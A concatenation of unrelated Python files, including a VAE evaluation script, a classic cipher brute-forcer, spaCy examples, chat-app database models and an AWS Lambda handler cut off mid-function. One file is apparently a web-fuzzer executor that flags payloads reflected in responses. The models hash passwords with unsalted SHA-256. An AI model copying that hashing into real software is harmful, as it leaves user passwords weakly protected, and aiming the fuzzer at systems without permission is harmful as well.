        with open('class_imbalance.csv', mode='w', newline='') as class_imbalance_result_file:
            writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
                                lineterminator='\n')
            writer.writerow(["autoencoder", "fp", "lfp_unc", "lfp_cte", "mean_CF", "std_CF"])
            writer.writerow([name, len(false_positive), len(likely_false_positive_unc), len(likely_false_positive_cte),
                             round(catastrophic_forgetting[0], 4),
                             round(catastrophic_forgetting[1], 4)])
    else:
        # NOTE(review): unlike the write branch, this open() omits
        # newline='' — inconsistent, can produce blank rows on Windows.
        with open('class_imbalance.csv', mode='a') as class_imbalance_result_file:
            writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
                                lineterminator='\n')
            writer.writerow([name, len(false_positive), len(likely_false_positive_unc), len(likely_false_positive_cte),
                             round(catastrophic_forgetting[0], 4),
                             round(catastrophic_forgetting[1], 4)])
    return likely_false_positive_unc, likely_false_positive_cte, catastrophic_forgetting
def load_and_eval_vae(cfg, dataset, delete_cache):
    """Load the trained VAE from disk, compute (or load cached) reconstruction
    losses on *dataset*, plot them against the Gamma-fit nominal threshold,
    and print the per-frame scores. Frees the model afterwards."""
    vae, name = load_vae(cfg, load_vae_from_disk=True)
    path = os.path.join(cfg.TESTING_DATA_DIR,
                        cfg.SIMULATION_NAME,
                        'driving_log.csv')
    data_df = pd.read_csv(path)
    losses = load_or_compute_losses(vae, dataset, name, delete_cache)
    threshold_nominal = get_threshold(losses, conf_level=0.95)
    plot_reconstruction_losses(losses, None, name, threshold_nominal, None, data_df)
    # passing losses twice: no retrained losses, so catastrophic forgetting
    # is skipped inside get_scores
    lfp_unc, lfp_cte, _ = get_scores(cfg, name, losses, losses, threshold_nominal)
    # release the Keras model and its GPU/host memory
    del vae
    K.clear_session()
    gc.collect()
def main():
    """Entry point: load the config and all images, then evaluate the VAE."""
    # Move from the script/ subdirectory up to the project root.
    os.chdir(os.getcwd().replace('script', ''))
    print(os.getcwd())

    configuration = Config()
    configuration.from_pyfile("config_my.py")

    images = load_all_images(configuration)
    load_and_eval_vae(configuration, images, delete_cache=True)


if __name__ == '__main__':
    main()
|
# Transposition Cipher Hacker
from .transposition_decryption import decrypt_message
def main():
    """Attempt to brute-force the sample transposition-cipher message."""
    my_message = """Cb b rssti aieih rooaopbrtnsceee er es no npfgcwu plri ch nitaalr eiuengiteehb(e1
hilincegeoamn fubehgtarndcstudmd nM eu eacBoltaetee oinebcdkyremdteghn.aa2r81a condari fmps" tad l t oisn sit
u1rnd stara nvhn fs edbh ee,n e necrg6 8nmisv l nc muiftegiitm tutmg cm shSs9fcie ebintcaets h a ihda cctrhe
ele 1O7 aaoem waoaatdahretnhechaopnooeapece9etfncdbgsoeb uuteitgna. rteoh add e,D7c1Etnpneehtn beete" evecoal
lsfmcrl iu1cifgo ai. sl1rchdnheev sh meBd ies e9t)nh,htcnoecplrrh ,ide hmtlme. pheaLem,toeinfgn t e9yce da' eN
eMp a ffn Fc1o ge eohg dere.eec s nfap yox hla yon. lnrnsreaBoa t,e eitsw il ulpbdofg BRe bwlmprraio po droB
wtinue r Pieno nc ayieeto'lulcih sfnc ownaSserbereiaSm -eaiah, nnrttgcC maciiritvledastinideI nn rms iehn
tsigaBmuoetcetias rn """

    hacked = hack_transposition(my_message)
    if hacked is None:
        print('Failed to hack encryption.')
        return
    print('Copying hacked message to clipboard:')
    print(hacked)
def hack_transposition(message):
    """Brute-force every possible transposition-cipher key for *message*.

    For each candidate key the message is decrypted and checked for
    English-looking text; the user confirms interactively. Returns the
    decrypted text, or None if no key is confirmed.
    """
    # Bug fix: detect_english was referenced below but never imported,
    # so every English-looking candidate raised NameError. Import it from
    # the same package as transposition_decryption (path inferred from the
    # sibling relative import — confirm the module name).
    from . import detect_english

    print('Hacking...')
    # Python programs can be stopped at any time by pressing
    # Ctrl-C (on Windows)
    # Ctrl-D (on Mac and Linux)
    print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
    # brute-force by looping through every possible key
    for key in range(1, len(message)):
        print('Trying key #%s...' % key)
        decrypted_text = decrypt_message(key, message)
        if detect_english.isEnglish(decrypted_text):
            # Check with user to see if the decrypted key has been found.
            print()
            print('Possible encryption hack:')
            print('Key %s: %s' % (key, decrypted_text[:100]))
            print()
            print('Enter D for done, or just press Enter to continue hacking:')
            response = input('> ')
            if response.strip().upper().startswith('D'):
                return decrypted_text
    return None
# Script entry point: run main() only when executed directly.
if __name__ == '__main__':
    main()
|
from brightics.common.repr import BrtcReprBuilder, strip_margin, pandasDF2MD, plt2MD
from brightics.function.utils import _model_dict
from brightics.common.groupby import _function_by_group
from brightics.common.utils import check_required_parameters
from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from statsmodels.tsa.stattools import acf
from statsmodels.tsa.stattools import pacf
import pandas as pd
from matplotlib import pyplot as plt
def autocorrelation(table, group_by=None, **params):
    """Dispatch the autocorrelation computation, optionally per group.

    With *group_by* set, _autocorrelation is applied to each group of
    *table*; otherwise it runs once on the whole table.
    """
    check_required_parameters(_autocorrelation, params, ['table'])
    if group_by is None:
        return _autocorrelation(table, **params)
    return _function_by_group(_autocorrelation, table, group_by=group_by, **params)
def _autocorrelation(table, input_col, nlags=20, conf_level=0.95):
    """Compute ACF/PACF for one column and build a markdown report model.

    Args:
        table: input dataframe.
        input_col: name of the column to analyse.
        nlags (int, optional): number of lags to compute. Defaults to 20.
        conf_level (float, optional): confidence level of the intervals.
            Defaults to 0.95.

    Returns:
        dict: {'model': model} where the model holds the ACF and PACF
        tables plus a markdown report embedding both plots.
    """
    data = table[input_col]
    # Render the ACF plot to a markdown image, then clear pyplot state.
    plt.figure()
    plot_acf(data, lags=nlags, alpha=1 - conf_level)
    fig_plt_acf = plt2MD(plt)
    plt.clf()
    plt.figure()
    plot_pacf(data, lags=nlags, alpha=1 - conf_level)
    fig_plt_pacf = plt2MD(plt)
    plt.clf()
    # With alpha set, acf/pacf return (values, confidence_intervals).
    acf_ret = acf(data, nlags=nlags, alpha=1-conf_level)
    pacf_ret = pacf(data, nlags=nlags, alpha=1-conf_level)
    # Tables have nlags + 1 rows because lag 0 is included.
    result_table1 = pd.DataFrame([])
    result_table1['lag'] = list(range(nlags + 1))
    result_table1['ACF'] = acf_ret[0]
    if conf_level is not None:
        result_table1['%g%% confidence Interval' % (conf_level * 100)] = [str((acf_ret[1][i][0], acf_ret[1][i][1])) for i in range(nlags + 1)]
    result_table2 = pd.DataFrame([])
    result_table2['lag'] = list(range(nlags + 1))
    result_table2['PACF'] = pacf_ret[0]
    if conf_level is not None:
        result_table2['%g%% confidence Interval' % (conf_level * 100)] = [str((pacf_ret[1][i][0], pacf_ret[1][i][1])) for i in range(nlags + 1)]
    # Assemble the markdown report (images + tables).
    rb = BrtcReprBuilder()
    rb.addMD(strip_margin("""# Autocorrelation / Partial Autocorrelation Result"""))
    rb.addMD(strip_margin("""
    |## Autocorrelation
    |
    |{image1}
    |
    |### Autocorrelation Table
    |
    |{result_table1}
    |
    |## Partial Autocorrelation
    |
    |{image2}
    |
    |### Partial Autocorrelation Table
    |
    |{result_table2}
    |
    """.format(image1=fig_plt_acf, result_table1=pandasDF2MD(result_table1, num_rows=nlags + 1), image2=fig_plt_pacf, result_table2=pandasDF2MD(result_table2, num_rows=nlags + 1))))
    model = _model_dict('autocorrelation')
    model['autocorrelation_table'] = result_table1
    model['partial_autocorrelation_table'] = result_table2
    model['_repr_brtc_'] = rb.get()
    return {'model':model}
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le paramètre 'carte' de la commande 'étendue'."""
from primaires.interpreteur.masque.parametre import Parametre
from primaires.salle.contextes.carte import CarteEtendue
class PrmCarte(Parametre):
    """Command 'etendue carte' (area map).

    Opens an editing context that displays a (truncated) map of a water
    area ("étendue"), centred near the invoking player's current room.
    """

    def __init__(self):
        """Parameter constructor."""
        Parametre.__init__(self, "carte", "map")
        self.schema = "<cle>"
        self.aide_courte = "affiche la carte de l'étendue"
        self.aide_longue = \
            "Cette commande permet d'afficher un contexte représentant " \
            "la carte (tronquée) de l'étendue. Les obstacles et les " \
            "liens peuvent être édités simplement ici. Le contexte " \
            "en lui-même propose beaucoup d'options et peut être " \
            "difficile à manipuler pour commencer (certaines étendues " \
            "sont bien plus grandes que la carte de base et il faut " \
            "apprendre à naviguer dedans) mais de l'aide est mise à " \
            "disposition pour vous aider à comprendre les différentes " \
            "possibilités d'édition."

    def interpreter(self, personnage, dic_masques):
        """Interpret the parameter: open the map context for the area."""
        cle = dic_masques["cle"].cle
        # Check that this area actually exists before doing anything
        if cle not in type(self).importeur.salle.etendues.keys():
            personnage << "|err|Cette clé {} n'existe pas.|ff|".format(
                    repr(cle))
            return

        etendue = type(self).importeur.salle.etendues[cle]
        # The map is anchored on the player's room, so it needs valid
        # coordinates to compute the viewport origin.
        if not personnage.salle.coords.valide:
            personnage << "|err|La salle où vous vous trouvez n'a pas " \
                    "de coordonnées valides.|ff|"
            return

        # NOTE(review): the -15/-8 offsets presumably centre the player
        # in the CarteEtendue viewport -- confirm against that class.
        x = int(personnage.salle.coords.x) - 15
        y = int(personnage.salle.coords.y) - 8
        contexte = CarteEtendue(personnage.instance_connexion, x, y)
        contexte.etendue = etendue
        personnage.contexte_actuel.migrer_contexte(contexte)
|
import spacy
# Import the Matcher
from spacy.matcher import Matcher
# Load a pretrained English pipeline and create the nlp object
nlp = spacy.load("en_core_web_sm")
# Token pattern: the literal text "iPhone" followed by "X".
# (It is added to a Matcher inside print_doc, not here.)
pattern = [{"TEXT": "iPhone"}, {"TEXT": "X"}]
# Process some text into a Doc
doc = nlp("Upcoming iPhone X release date leaked")
def print_doc(doc, pattern):
    """Run *pattern* over *doc* with a fresh Matcher and print each hit.

    For every match, prints the match id with its token offsets, then the
    matched span's text; finishes with one blank separator line.
    """
    # Build a new Matcher on the pipeline's shared vocab for each call.
    matcher = Matcher(nlp.vocab)
    matcher.add("mypattern", [pattern])
    for match_id, start, end in matcher(doc):
        print(match_id, start, end)
        print(doc[start:end])
    print()
print_doc(doc, pattern)

# Pattern: a digit token, the words "fifa world cup" (case-insensitive
# via LOWER), then a punctuation token -- e.g. "2018 FIFA World Cup:".
pattern = [
    {"IS_DIGIT":True},
    {"LOWER":"fifa"},
    {"LOWER":"world"},
    {"LOWER":"cup"},
    {"IS_PUNCT":True}
]
doc = nlp("2018 FIFA World Cup: France won!")
print_doc(doc, pattern)

# Pattern: lemma "love" used as a verb, followed by a noun --
# matches both "loved dogs" and "love cats".
pattern = [
    {"LEMMA":"love", "POS": "VERB"},
    {"POS":"NOUN"}
]
doc = nlp("I loved dogs but now I love cats more.")
print_doc(doc, pattern)

# Pattern: any form of "buy", an optional determiner ("OP": "?"),
# then a noun -- matches "bought a smartphone" and "buying apps".
pattern = [
    {"LEMMA": "buy"},
    {"POS": "DET", "OP":"?"},
    {"POS": "NOUN"}
]
doc = nlp("I bought a smartphone. Now I'm buying apps.")
print_doc(doc, pattern)
import requests
import logging
import time
import json
from utils import *
class Executor():
    """Sends a prepared HTTP request and logs notable outcomes.

    Notable outcomes are: a response status code differing from the
    expected one, and payload values reflected back in the response body
    (potential injection points).
    """

    def __init__(self):
        pass

    @staticmethod
    def _code_str(code, fallback):
        """Render a status code as 'NNN (description)'.

        Uses Config.http_codes for the description when the code is
        known, otherwise the supplied fallback text.
        """
        if code in Config.http_codes:
            return str(code) + " (" + Config.http_codes[code] + ")"
        return str(code) + " (" + fallback + ")"

    @staticmethod
    def _log_event(event_type, pre_request, elapsed, expected_code_str,
                   response_code_str, payload_str):
        """Emit one formatted event record to the configured logger."""
        log_string = ""
        log_string += "===============================================================================>>\n"
        log_string += "Event Type: " + event_type + "\n"
        log_string += "Request Type: " + pre_request.req_type + "\n"
        log_string += "Execution Time: " + str(elapsed) + "\n"
        log_string += "Expected Code: " + expected_code_str + "\n"
        log_string += "Response Code: " + response_code_str + "\n"
        log_string += "Payload: " + payload_str + "\n"
        log_string += "Headers: " + str(pre_request.headers) + "\n"
        log_string += "Cookies: " + str(pre_request.cookies) + "\n"
        Config.logger.info(log_string)

    def execute(self, pre_request):
        """Send *pre_request*, compare against expectations, log findings.

        Args:
            pre_request: prepared request object carrying req_type,
                destination, headers, cookies, body, payload and
                expected_status_code attributes.
        """
        try:
            # Merge the globally configured cookies into this request.
            for key, value in Config.static_cookies.items():
                pre_request.cookies[key] = value
            start = time.time()
            # ======= START =======
            # Bug fix: req_type was compared with 'is', which tests
            # object identity and only worked by CPython string-interning
            # accident; '==' is the correct comparison.
            if pre_request.req_type == "GET":
                response = requests.get(
                    pre_request.destination,
                    headers=pre_request.headers,
                    cookies=pre_request.cookies
                )
            elif pre_request.req_type in ("POST", "PUT", "PATCH"):
                # These three only differ in the requests function used.
                send = getattr(requests, pre_request.req_type.lower())
                response = send(
                    pre_request.destination,
                    headers=pre_request.headers,
                    cookies=pre_request.cookies,
                    data=pre_request.body
                )
            else:
                # Previously an unknown req_type fell through and raised
                # NameError on 'response'; report it explicitly instead.
                Config.logger.info(
                    "Skipping unsupported request type: "
                    + str(pre_request.req_type))
                return
            # ========= END =========
            end = time.time()
            expected_code_str = self._code_str(
                pre_request.expected_status_code, "Unknown Code")
            response_code_str = self._code_str(
                response.status_code, response.reason)
            # Status-code allow/deny filters from configuration.
            if str(response.status_code) in Config.exclude_code:
                Config.logger.info("Returning because of exclude code: " + str(response.status_code))
                return
            if Config.include_code:
                if str(response.status_code) not in Config.include_code:
                    Config.logger.info("Returning because of include code: " + str(response.status_code))
                    return
            if response.status_code != pre_request.expected_status_code:
                self._log_event(
                    "Server Response Changed", pre_request, end - start,
                    expected_code_str, response_code_str,
                    str(pre_request.payload))
            # Reflection check: a payload value present in this response
            # but absent from the baseline response suggests reflection.
            if isinstance(pre_request.payload, dict):
                for key, value in pre_request.payload.items():
                    if value in response.text and value not in Config.initial_response.text:
                        self._log_event(
                            "Reflective Header", pre_request, end - start,
                            expected_code_str, response_code_str,
                            str(key) + " : " + str(value))
            else:
                if pre_request.payload in response.text and pre_request.payload not in Config.initial_response.text:
                    self._log_event(
                        "Reflective Header", pre_request, end - start,
                        expected_code_str, response_code_str,
                        str(pre_request.payload))
        except Exception:
            Config.logger.debug("Error occured in executor function!", exc_info=True)
"""
This module contains models in database, this module defines the
following classes:
- `ModelMixin`, base model mixin used in every other model;
- `User`, user model;
- `Chat`, chat model;
- `Message`, message model.
"""
from __future__ import annotations
from datetime import datetime as dt
from hashlib import sha256
from typing import Any, NoReturn, Optional, TypeVar, Type, Union
from sqlalchemy import (
Table, Column, Integer, ForeignKey, DateTime,
String, Enum, Boolean, desc, event
)
from sqlalchemy.engine import Engine
from sqlalchemy.ext.hybrid import hybrid_method, hybrid_property
from sqlalchemy.orm import backref, load_only, relationship, validates
from sqlalchemy.schema import CheckConstraint
from flask_sqlalchemy import BaseQuery
from shmelegram import db, utils
from shmelegram.config import ChatKind, BaseConfig
ModelType = TypeVar('ModelType', bound='ModelMixin')
ModelId = TypeVar('ModelId')
JsonDict = dict[str, Any]
@event.listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
    """Enable foreign keys for SQLite testing database."""
    # pylint: disable=unused-argument
    if not BaseConfig.TESTING:
        return
    # SQLite ships with foreign-key enforcement off; turn it on for
    # every new test connection.
    cursor = dbapi_connection.cursor()
    cursor.execute("PRAGMA foreign_keys=ON")
    cursor.close()
# Association table: many-to-many membership of users in chats.
# Rows disappear automatically when the chat or user is deleted (CASCADE).
chat_membership = Table(
    'chat_membership', db.Model.metadata,
    Column(
        'chat_id', Integer, ForeignKey('chat.id', ondelete="CASCADE")
    ),
    Column(
        'user_id', Integer, ForeignKey('user.id', ondelete="CASCADE")
    )
)
# Association table: which users have seen which messages.
message_view = Table(
    'message_view', db.Model.metadata,
    Column(
        'user_id', Integer, ForeignKey('user.id', ondelete="CASCADE")
    ),
    Column(
        'message_id', Integer,
        ForeignKey('message.id', ondelete="CASCADE")
    )
)
class ModelMixin:
    """
    Basic ModelMixin containing different class utilities.

    Provides existence checks, lookup, bulk update, delete and save
    helpers shared by every model in this module.
    """

    @classmethod
    def exists(cls, id_: ModelId) -> bool:
        """
        Check if model with this id exists

        Args:
            id_ (int)

        Returns:
            bool
        """
        # EXISTS subquery avoids loading the row itself.
        return db.session.query(
            cls.query.filter(cls.id == id_).exists()
        ).scalar()

    def update(self, data: JsonDict) -> None:
        """
        Update model according to dict data.

        Args:
            data (JsonDict): data to be updated

        Returns:
            None
        """
        for key, value in data.items():
            setattr(self, key, value)
        db.session.add(self)

    @classmethod
    def get(cls: Type[ModelType], id_: ModelId) -> ModelType:
        """
        Get model by some id

        Args:
            id_ (int): id of model to be retrieved

        Raises:
            ValueError: if model with such id does not exist.
                Use `exists()` to check if the id exists

        Returns:
            db.Model: model
        """
        model = cls.query.get(id_)
        if model is None:
            raise ValueError(f'{cls.__name__} with id {id_} does not exist')
        return model

    @classmethod
    def get_or_none(cls: Type[ModelType], id_: ModelId) -> Optional[ModelType]:
        """
        Get model by some id. If this id does not exist, return None

        Args:
            id_ (int): id of model to be retrieved

        Returns:
            db.Model: model, or None when not found
        """
        return cls.query.get(id_)

    def delete(self) -> None:
        """
        Delete model from database and flush the database data.

        Returns:
            None
        """
        db.session.delete(self)
        db.session.flush()

    def save(self) -> None:
        """
        Save model to database and flush the database data.

        Returns:
            None
        """
        db.session.add(self)
        db.session.flush()
class User(db.Model, ModelMixin):
    """
    Model representing user.

    Arguments:
        username (str): user's username. Unique.
        password (str): is stored encrypted using sha256.
        last_online (datetime, optional): last online UTC datetime. Defaults to `datetime.utcnow()`
    """
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    username = Column(String(30), unique=True, nullable=False)
    # 64 chars: length of a sha256 hex digest
    password = Column(String(64), nullable=False)
    last_online = Column(
        DateTime(), default=dt.utcnow,
        nullable=True, onupdate=dt.utcnow
    )  # None means online now
    __table_args__ = (
        CheckConstraint(
            'length(username) > 4', name='username_min_length'
        ),
    )

    def __repr__(self) -> str:
        return self.__class__.__name__ + (
            f"(id={self.id}, username={self.username!r})"
        )

    def update_last_online(self) -> None:
        """
        Update user's last online to current UTC and save model.

        Returns:
            None
        """
        self.last_online = dt.utcnow()
        self.save()

    @classmethod
    def get_by_username(cls, username: str, /) -> User:
        """
        Get user by given username.

        Args:
            username (str): user with such username to be retrieved.

        Raises:
            ValueError: if such user does not exist

        Returns:
            User: user with given username
        """
        user = cls.query.filter(cls.username == username).first()
        if user is None:
            raise ValueError(
                f"{cls.__name__} with username {username!r} does not exist"
            )
        return user

    @classmethod
    def username_exists(cls, username: str, /) -> bool:
        """
        Check if user with given username exists.

        Args:
            username (str)

        Returns:
            bool
        """
        # Query only the id column -- cheaper than loading the full row.
        return db.session.query(User.id).filter_by(
            username=username).first() is not None

    @classmethod
    def startwith(cls, name: str = '', /, *, query: bool = False) -> Union[BaseQuery, list[User]]:
        """
        Return all users whose username starts with `name`.

        Args:
            name (str, optional): username start. Defaults to ''.
            query (bool, optional): to return as `flask_sqlalchemy.BaseQuery`. Defaults to False.

        Returns:
            Union[BaseQuery, list[User]]
        """
        users = cls.query.filter(
            cls.username.startswith(name)
        )
        if not query:
            users = users.all()
        return users

    @hybrid_method
    def check_password(self, password: str) -> bool:
        """
        Check if given password matches the user's password.

        Args:
            password (str)

        Returns:
            bool
        """
        # Compare hash-to-hash; the stored password is a sha256 digest.
        return sha256(password.encode('utf-8')).hexdigest() == self.password

    @validates('username')
    def validate_username(self, key: str, value: str) -> str:
        """
        Validate username. Fires on every username update.

        Args:
            key (str): 'username'
            value (str): username value

        Raises:
            ValueError: if username is invalid

        Returns:
            str: username value
        """
        # pylint: disable=unused-argument
        if not utils.validate_username(value):
            raise ValueError('invalid username')
        return value

    @validates('password')
    def validate_password(self, key: str, value: str) -> str:
        """
        Validate password. Fires on every password update.

        Args:
            key (str): 'password'
            value (str): password value

        Raises:
            ValueError: if password is invalid

        Returns:
            str: sha256 hex digest of the password value
        """
        # pylint: disable=unused-argument
        if not utils.validate_password(value):
            raise ValueError('invalid password')
        # Store the hash, never the plain-text password.
        return sha256(value.encode('utf-8')).hexdigest()
class Message(db.Model, ModelMixin):
    """
    Model representing message.

    Arguments:
        chat (Chat): chat which message belongs to
        from_user (User): sender user
        is_service (bool, optional), defaults to False.
        text (str): message text
        reply_to (Message): message which this message is reply to
        created_at (datetime, optional), defaults to `datetime.utcnow()`
        edited_at (datetime, optional), defaults to None
    """
    __tablename__ = 'message'
    id = Column(Integer, primary_key=True)
    from_user_id = Column(Integer, ForeignKey('user.id'))
    chat_id = Column(
        Integer, ForeignKey('chat.id', ondelete="CASCADE")
    )
    is_service = Column(Boolean, nullable=False, default=False)
    # Replies survive deletion of their target (FK set to NULL).
    reply_to_id = Column(
        Integer, ForeignKey('message.id', ondelete="SET NULL")
    )
    text = Column(String(4096), nullable=False)
    created_at = Column(
        DateTime(), default=dt.utcnow
    )
    # None until the message is first edited.
    edited_at = Column(
        DateTime(), onupdate=dt.utcnow,
        nullable=True, default=None
    )
    from_user = relationship(
        'User', uselist=False, foreign_keys=[from_user_id]
    )
    seen_by = relationship(
        'User', secondary=message_view, lazy='dynamic',
        passive_deletes=True,
    )
    # Self-referential relationship for threaded replies.
    reply_to = relationship('Message', remote_side=[id])

    @validates('seen_by', include_removes=True)
    def validate_view(self, key: str, user: User, is_remove: bool) -> User:
        """
        Validate view addition. Fires on every view addition or removal.

        Args:
            key (str): 'seen_by'
            user (User): user to add the view from
            is_remove (bool): whether this call is for removal

        Raises:
            ValueError: if is_remove is True (views are never removed)
            ValueError: if user is not member of message's chat

        Returns:
            User: user that was validated. Same user as the one passed in.
        """
        # pylint: disable=unused-argument
        if is_remove:
            raise ValueError('not allowed to remove view')
        if user not in self.chat.members:
            raise ValueError('cannot add view by non-member user')
        return user

    @hybrid_method
    def add_view(self, user: User) -> bool:
        """
        Add view to the message by user.

        Args:
            user (User): user to add the view from

        Returns:
            bool: always True
        """
        self.seen_by.append(user)
        return True

    def __repr__(self) -> str:
        return self.__class__.__name__ + (
            f"(id={self.id}, chat={self.chat!r}, from_user={self.from_user!r})"
        )
class Chat(db.Model, ModelMixin):
    """
    Model representing chat.

    Arguments:
        kind (ChatKind): type of chat
        title (str, optional): title for group chat

    Raises:
        ValueError: chat is private and has title, or chat is group and no title
    """
    __tablename__ = 'chat'
    id = Column(Integer, primary_key=True)
    kind = Column(Enum(ChatKind))
    # None for private chats; see get_private_title().
    title = Column(String(50), nullable=True)
    members = relationship(
        'User', secondary=chat_membership, passive_deletes=True,
        backref=backref('chats', lazy='dynamic')
    )
    # Newest first; deleting the chat deletes its messages.
    messages = relationship(
        'Message', lazy='dynamic', backref='chat',
        cascade="all,delete,delete-orphan",
        passive_deletes=True, order_by=desc(Message.created_at)
    )

    def __init__(self, *, kind: ChatKind, title: str = None):
        if kind is ChatKind.PRIVATE and title:
            raise ValueError('unable to set title in private chat')
        if kind is ChatKind.GROUP and not title:
            raise ValueError('unable to create non-private chat without title')
        super().__init__(kind=kind, title=title)

    @validates('members')
    def validate_member(self, key: str, user: User) -> User:
        """
        Validate member. Fires on every member addition.

        Args:
            key (str): 'members'
            user (User): user to be validated

        Raises:
            ValueError: new member count equals to member limit

        Returns:
            User: user that was validated. Same user as the one was passed.
        """
        # pylint: disable=unused-argument
        member_limit = self.member_limit
        if self.member_count >= member_limit:
            raise ValueError(
                f'member count exceeds member limit ({member_limit})'
            )
        return user

    @hybrid_property
    def member_limit(self) -> int:
        """
        Max member limit property.

        The limit is encoded as the ChatKind enum value.

        Returns:
            int
        """
        return self.kind.value

    @hybrid_property
    def member_count(self) -> int:
        """
        Current member count property.

        Returns:
            int
        """
        return len(self.members)

    def add_member(self, user: User) -> bool:
        """
        Add member to collection. See `validate_member` for errors.

        Args:
            user (User): user to be added.

        Returns:
            bool: always True
        """
        self.members.append(user)
        return True

    def remove_member(self, user: User) -> bool:
        """
        Remove member from collection.

        NOTE(review): despite the previous doc claiming the call is
        ignored for non-members, `list.remove` raises ValueError when
        the user is not in the collection.

        Args:
            user (User): user to be removed.

        Returns:
            bool: always True
        """
        self.members.remove(user)
        return True

    def get_unread_messages(self, user: User) -> list[Message]:
        """
        Get unread messages by a user.

        If user is not a member of the chat, raise ValueError.

        Args:
            user (User): user to be checked

        Returns:
            list[Message]
        """
        if user not in self.members:
            raise ValueError('cannot get messages by non-member user')
        # Only the id column is loaded for each unread message.
        return self.messages.filter(~Message.seen_by.any(User.id == user.id))\
            .options(load_only("id")).all()

    def get_private_title(self, user: User) -> str:
        """
        Get private title for user.

        Title for private chats is None, so the title has to be
        retrieved as the companion user's username.

        Args:
            user (User): user for which the title is retrieved

        Raises:
            ValueError: chat type is not private
            ValueError: user is not member of this chat

        Returns:
            str
        """
        if self.kind is not ChatKind.PRIVATE:
            raise ValueError("cannot get private title of non-private chat")
        members = list(self.members)
        if user not in members:
            raise ValueError('cannot get title for non-member user')
        # A private chat has exactly two members; the remaining one
        # after removing the caller is the companion.
        members.remove(user)
        return members[0].username

    @classmethod
    def get_by_title(cls, title: str, /) -> Chat:
        """
        Get chat by total matching to given title.

        Args:
            title (str)

        Raises:
            ValueError: chat with such title does not exist

        Returns:
            Chat
        """
        chat = cls.query.filter(cls.title == title).first()
        if chat is None:
            raise ValueError(
                f'{cls.__name__} with title {title!r} does not exist'
            )
        return chat

    @classmethod
    def startwith(cls, name: str = '', /, *, query: bool = False) -> Union[BaseQuery, list[Chat]]:
        """
        Get all chats whose title starts with `name`.

        Since private chats have a title of None, they are not included.

        Args:
            name (str, optional): start of the title. Defaults to ''.
            query (bool, optional): to return as `flask_sqlalchemy.BaseQuery`. Defaults to False.

        Returns:
            Union[flask_sqlalchemy.BaseQuery, list[Chat]]
        """
        chats = cls.query.filter(
            cls.title.startswith(name)
        )
        if not query:
            chats = chats.all()
        return chats

    def __repr__(self) -> str:
        return self.__class__.__name__ + (
            f"(id={self.id}, kind={self.kind.name})"
        )
|
# lc643.py
# LeetCode 643. Maximum Average Subarray I `E`
# 1sk | 98% | 9'
# A~0g17
class Solution:
    """LeetCode 643: maximum average of a length-k contiguous subarray."""

    def findMaxAverage(self, nums: List[int], k: int) -> float:
        """Return the largest average over all windows of exactly k elements."""
        window = sum(nums[:k])  # sum of the first window
        best = window
        # Slide the window one step at a time: add the element entering
        # on the right, drop the one leaving on the left.
        for leaving, entering in zip(nums, nums[k:]):
            window += entering - leaving
            if window > best:
                best = window
        return best / k
|
import json
import boto3
import cattrs
from src.common.constants import NEWS_STORIES_TABLE_NAME, S3_BUCKET_NAME
from src.common.enums.api_response_codes import APIResponseCodes
from src.common.models.news_story import NewsStory
from src.common.services.dynamodb import DynamoDB
from src.common.services.lambda_ import Lambda
from src.common.services.logger import get_logger
LOGGER = get_logger()
def submit_news_story(event, context):
    """AWS Lambda handler: store a news story and its thumbnail.

    Expects a JSON "body" with "story" and "thumbnail" keys, plus an
    "is64Encoded" flag on the event itself. The thumbnail is written to
    S3 and the story record to DynamoDB.

    Args:
        event: API Gateway event; "body" is a JSON string.
        context: Lambda context object (unused).

    Returns:
        dict: formatted API response -- 400 listing the missing keys, or
        200 with the stored story carrying the thumbnail inline.
    """
    body = json.loads(event.get("body", None))
    story = body.get("story", None)
    # NOTE(review): read from the event, not the body, and only used for
    # presence validation -- confirm whether base64 decoding was intended.
    is_64_encoded = event.get("is64Encoded", None)
    thumbnail = body.get("thumbnail", None)
    if story is None or is_64_encoded is None or thumbnail is None:
        # Collect every missing key so the error reports all at once.
        missing_keys = []
        if story is None:
            missing_keys.append("story")
        if is_64_encoded is None:
            missing_keys.append("is64Encoded")
        if thumbnail is None:
            missing_keys.append("thumbnail")
        error_message = f"Event processed does not have keys: {missing_keys}"
        LOGGER.error(error_message)
        return Lambda.format_response(
            status_code=APIResponseCodes.BAD_REQUEST, error_message=error_message
        )
    news_story = cattrs.structure(story, NewsStory)
    # Upload the thumbnail bytes under the story's S3 key.
    s3 = boto3.resource("s3")
